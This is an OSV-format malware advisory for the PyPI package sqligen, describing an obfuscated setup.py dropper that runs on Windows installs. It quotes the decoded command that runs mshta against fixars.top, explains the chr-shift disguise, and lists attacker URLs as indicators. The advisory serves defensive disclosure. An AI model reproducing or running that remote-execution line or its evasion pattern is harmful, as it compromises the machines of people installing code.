{"id":"MAL-2026-6515","summary":"Malicious code in sqligen (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (de59ac5884f286d69e42a71ba0cb7b99aa06d2b1f0e28a279a84d3db86eb3196)\nsetup.py contains an obfuscated install-time dropper that fires on Windows. Two functions with diagnostic-sounding names ('GetDefaultSystemPolicy' / 'CalculateNodeDrift', backed by integer arrays presented as 'InterruptThresholds' and 'ThreadPingLatencies') decode via chr(value+14) arithmetic to the strings 'mshta' and 'https://fixars.top'. On Windows, GetGitCommitHash() runs subprocess.check_output(['mshta', 'https://fixars.top'], shell=True), executing an arbitrary remote HTA payload from fixars.top. This codepath is reached from CustomInstallCommand, CustomBuildPyCommand, and CustomDevelopCommand, so any `pip install sqligen` (or `pip install -e.`) on a Windows host triggers remote code execution under the installing user's account. The obfuscation (cover-story variable names, chr-shift encoding of the command and URL) demonstrates intentional evasion of source review; legitimate build tooling does not encode 'mshta' as 'hardware interrupt latency thresholds'. The fetched payload is attacker-controlled and unrelated to the package's stated SQL-generation purpose.\n\n## Source: kam193 (b84d9f4006cbb5db6790a6de402754f0937758e861efe6ec0bc3ba156415327c)\nDuring installation, the code attempts to download and start a malicious executable.\n\nLikely related to 2025-08-raknet-testing-package.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-easyaillm\n\n\nReasons (based on the campaign):\n\n\n - Downloads and executes a remote executable.\n\n\n - obfuscation\n\n\n - malware\n\n\n - tool:mshta\n","modified":"2026-07-09T16:32:05.816620420Z","published":"2026-06-26T09:23:52Z","database_specific":{"malicious-packages-origins":[{"sha256":"b84d9f4006cbb5db6790a6de402754f0937758e861efe6ec0bc3ba156415327c","import_time":"2026-06-26T10:34:51.116691576Z","id":"pypi/2026-06-easyaillm/sqligen","modified_time":"2026-06-26T09:23:53.213083Z","versions":["1.0.0","1.0.5","1.0.6","1.0.7","1.0.8","1.1.1","1.1.3","1.1.4"],"source":"kam193"},{"id":"IN-MAL-2026-007778","modified_time":"2026-06-29T07:45:17Z","ranges":[{"events":[{"introduced":"0"}],"type":"ECOSYSTEM"}],"versions":["1.0.7"],"source":"amazon-inspector","sha256":"6757e6c11ba58c93d394399433beab9866ec37417e7b6217110e8dec3eefd22a","import_time":"2026-06-29T09:10:17.087639217Z"},{"source":"amazon-inspector","sha256":"de59ac5884f286d69e42a71ba0cb7b99aa06d2b1f0e28a279a84d3db86eb3196","import_time":"2026-06-29T09:10:16.979926704Z","id":"IN-MAL-2026-007777","modified_time":"2026-06-29T07:45:07Z","ranges":[{"events":[{"introduced":"0"}],"type":"ECOSYSTEM"}],"versions":["1.1.4"]},{"source":"amazon-inspector","sha256":"3a3e096836d992f01e091f3336e616533c580cb17f5d7eefca3c5d6ce8de7c26","import_time":"2026-07-08T20:32:23.584577952Z","id":"IN-MAL-2026-008399","modified_time":"2026-07-08T20:04:31Z","versions":["1.0.8"]},{"versions":["1.1.1"],"source":"amazon-inspector","sha256":"71b150d072ecf2c233da2da933c59c9eca60a5f537864bcf9f8ccb32892a75c2","import_time":"2026-07-08T20:32:35.955475969Z","id":"IN-MAL-2026-008494","modified_time":"2026-07-08T20:19:05Z"},{"modified_time":"2026-07-08T20:17:39Z","versions":["1.0.0"],"source":"amazon-inspector","sha256":"7f0a42f0f6a06c48ae2682290be0733216c10b9234853308a4f4af2198b9241c","import_time":"2026-07-08T20:32:34.899687187Z","id":"IN-MAL-2026-008485"},{"id":"IN-MAL-2026-008487","modified_time":"2026-07-08T20:18:02Z","versions":["1.0.5"],"source":"amazon-inspector","sha256":"8dfee9192060012de61fdbda198e493bb6cb2646a25c1888063e6337201355b9","import_time":"2026-07-08T20:32:35.114335791Z"},{"versions":["1.0.6"],"source":"amazon-inspector","sha256":"c0b419353b77baa9e6a5dcc182a6ba9ae5c48f65a27a5306f6798c7b3a86db25","import_time":"2026-07-08T20:32:35.533632167Z","id":"IN-MAL-2026-008490","modified_time":"2026-07-08T20:18:29Z"},{"id":"IN-MAL-2026-009176","modified_time":"2026-07-09T15:39:27Z","versions":["1.1.3"],"source":"amazon-inspector","sha256":"188827064b2c53b37e21e32faa7ec5e59aed3872a59bfcabd087e7b6e75c6db4","import_time":"2026-07-09T16:20:48.329986552Z"}],"iocs":{"domains":["fixars.top"],"urls":["https://pastebin.com/raw/hEF5HaFc","https://pastebin.com/raw/yBcUM1QBs","https://pastebin.com/raw/yBcUM1QB","http://fixars.top","https://tmpfiles.org/dl/wawHVGgfydD7/6a306c5f03a52.exe","http://62.60.226.243/public_files/98r4aXA.txt","http://62.60.226.243/public_files/16sas.jpg?12711313"]}},"references":[{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/1a5beab4a6facb46b4afc5f8526e1327e6c7d740ccaf34c6a921ac18eff29427/detection"},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/4c99c8edfc4444f46932f14afccb2952a3850df765765f9ac793d69f318c192f/detection"},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/0649f50ead3695f41c1243883200bdb775410bcd8c8fb88277740a625a154e25"},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/926e8f1a7f349ff1eef31f89fa8ffe265c30b92e310e8bea19962d38f8c32129"},{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/sqligen"},{"type":"PACKAGE","url":"https://pypi.org/project/sqligen/1.0.7/"},{"type":"PACKAGE","url":"https://pypi.org/project/sqligen/1.1.4/"},{"type":"PACKAGE","url":"https://pypi.org/project/sqligen/1.0.8/"},{"type":"PACKAGE","url":"https://pypi.org/project/sqligen/1.1.1/"},{"type":"PACKAGE","url":"https://pypi.org/project/sqligen/1.0.0/"},{"type":"PACKAGE","url":"https://pypi.org/project/sqligen/1.0.5/"},{"type":"PACKAGE","url":"https://pypi.org/project/sqligen/1.0.6/"},{"type":"PACKAGE","url":"https://pypi.org/project/sqligen/1.1.3/"}],"affected":[{"package":{"name":"sqligen","ecosystem":"PyPI","purl":"pkg:pypi/sqligen"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"}]}],"versions":["1.0.0","1.0.5","1.0.6","1.0.7","1.0.8","1.1.1","1.1.3","1.1.4"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"evidence_files":[{"path":"setup.py","sha256":"d8aab7c8f3cb71592b0189a4381a47659ce2719716eada3e4b82d130a152d1e9","tlsh":"55221987da670a71a7c643f0990717c67b75fa2b1a014474bdeec10c1f4a1ba83772ad"},{"tlsh":"5d31c5e125c699b43fd349456904a54add21da00ee8864d9ecf78a9f59442ad633e03c","path":"PKG-INFO","sha256":"8b5c2f86b11617b4cefe83d4d769960a20138de71bf6cba908ab9bcc5b2bac12"}],"package_integrity":[{"hashes":{"sha256":"f618fb3e9817844227173b54ac45581e9544bd1fba7e71cfee898ab72a14f34f","blake2b_256":"e9c19ca970b76dc76ae6169c862429bf847517f28e7c310ee05ffa2dc9cece7f","md5":"37319baa8518357c71445a11865cd751"},"filename":"sqligen-1.0.7-py3-none-any.whl"},{"filename":"sqligen-1.0.7.tar.gz","hashes":{"md5":"b920246e4a18680183ea4e0ef160c320","sha256":"37394e15e1ca37c4e34c7c6b1d25361ac0f38a7f8bc03a133bd8466b0282bf6b","blake2b_256":"055f483b64fe7b5e64b5f2b85d34e705b35ca5778525962d23a035248653fd80"}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/sqligen/MAL-2026-6515.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"}]}